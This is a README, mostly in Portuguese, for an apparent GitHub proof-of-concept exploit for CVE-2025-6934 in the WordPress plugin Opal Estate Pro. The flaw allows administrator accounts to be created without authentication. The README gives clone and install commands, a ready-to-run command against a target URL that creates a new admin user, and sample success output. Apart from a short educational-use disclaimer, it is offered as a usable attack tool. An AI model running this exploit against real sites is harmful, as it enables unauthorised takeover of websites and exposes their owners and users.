
Exploit de prova de conceito para CVE-2025-6934, uma vulnerabilidade crítica no plugin WordPress Opal Estate Pro que permite a criação não autenticada de contas de administrador. Inclui detecção automática de versão, extração de nonce e exploração de endpoint AJAX.
📖 Descrição
Este repositório contém um exploit Proof of Concept (PoC) para CVE-2025-6934,
uma vulnerabilidade crítica no Plugin WordPress: Opal Estate Pro <= 1.7.5, que permite criação de conta de administrador sem autenticação.
⚠️ Aviso: Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa em segurança.
O autor não se responsabiliza por uso indevido ou danos causados.
readme.txtClone o repositório e instale as dependências:
git clone https://github.com/yukinime/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Execute o script com seu alvo:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Exemplo de saída:
[✔] Eksploitasi Berhasil!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator
Screenshot Eksploitasi
Cyberlone Indonesia (Cyberlone)
Este projeto está licenciado sob a Licença MIT – veja LICENSE para detalhes.